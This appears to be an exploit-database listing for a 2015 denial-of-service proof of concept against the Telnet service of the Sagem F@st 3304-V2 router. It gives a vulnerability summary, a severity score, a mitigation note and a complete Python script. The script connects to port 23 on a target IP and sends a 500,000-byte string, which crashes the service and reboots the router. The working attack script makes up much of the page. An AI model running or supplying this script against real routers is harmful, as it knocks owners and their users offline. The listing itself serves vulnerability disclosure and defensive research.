header-logo
Suggest Exploit
vendor:
F@st 3304-V2
by:
Loudiyi Mohamed
7.5
CVSS
HIGH
Memory Corruption Vulnerability
119
CWE
Product Name: F@st 3304-V2
Affected Version From: Sagem F@st 3304-V2
Affected Version To: Sagem F@st 3304-V2 (other versions may also be affected)
Patch Exists: NO
Related CWE: N/A
CPE: h:sagem:fast_3304-v2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2015

Sagem F@st 3304-V2 Telnet Crash POC

A Memory Corruption Vulnerability is detected on Sagem F@st 3304-V2 Telnet service. An attacker can crash the router by sending a very long string. This exploit connects to Sagem F@st 3304-V2 Telnet (Default port 23) and sends a very long string "X"*500000. After the exploit is sent, the telnet service will crash and the router will reboot automatically.

Mitigation:

Disable Telnet service on the router and use secure protocols like SSH for remote access.
Source

Exploit-DB raw data:

# Title              : Sagem F@st 3304-V2 Telnet Crash POC
# Vendor             : http://www.sagemcom.com
# Severity           : High
# Tested Router      : Sagem F@st 3304-V2 (3304-V1, other versions may also be affected)
# Date               : 2015-03-08
# Author             : Loudiyi Mohamed
# Contact            : Loudiyi.2010@gmail.com
# Blog               : https://www.linkedin.com/pub/mohamed-loudiyi/86/81b/603
# Vulnerability description:
#==========================
#A Memory Corruption Vulnerability is detected on Sagem F@st 3304-V2 Telnet service. An attacker can crash the router by sending a very long string.
#This exploit connects to Sagem F@st 3304-V2 Telnet (Default port 23) and sends a very long string "X"*500000.
#After the exploit is sent, the telnet service will crash and the router will reboot automatically.
 
#Usage: python SagemDos.py "IP address"

# Code
#========================================================================
 #!/usr/bin/python
import socket
import sys
print("######################################")
print("#    DOS Sagem F@st3304 v1-v2        #")
print("#   	----------                  #")
print("#       BY  LOUDIYI MOHAMED          #")
print("#####################################")
if (len(sys.argv)<2):
	print "Usage: %s <host> " % sys.argv[0]
	print "Example: %s 192.168.1.1 " % sys.argv[0]
	exit(0)
print "\nSending evil	buffer..."
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
 s.connect((sys.argv[1], 23))
 buffer = "X"*500000
 s.send(buffer)
except:
 print "Could not connect to Sagem Telnet!"
#========================================================================

Navigation

Suggest Exploit

Services By CQR